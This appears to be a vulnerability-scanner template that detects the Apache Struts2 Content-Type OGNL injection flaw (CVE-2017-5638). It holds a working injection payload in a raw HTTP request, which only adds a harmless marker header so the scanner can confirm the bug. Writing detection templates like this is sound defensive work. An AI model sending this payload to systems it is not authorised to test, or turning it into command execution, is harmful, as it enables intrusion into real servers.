27 lines
1.1 KiB
YAML
27 lines
1.1 KiB
YAML
id: CVE-2017-5638
|
||
info:
|
||
author: Random Robbie
|
||
name: Apache Struts2 RCE
|
||
severity: critical
|
||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||
tags: cve,cve2017,struts,rce,apache
|
||
reference: https://github.com/mazen160/struts-pwn
|
||
|
||
requests:
|
||
- raw:
|
||
- |
|
||
GET / HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||
Accept-Language: en
|
||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||
Connection: Keep-Alive
|
||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||
Pragma: no-cache
|
||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||
|
||
matchers:
|
||
- type: word
|
||
words:
|
||
- "X-Hacker: Bounty Plz"
|
||
part: header |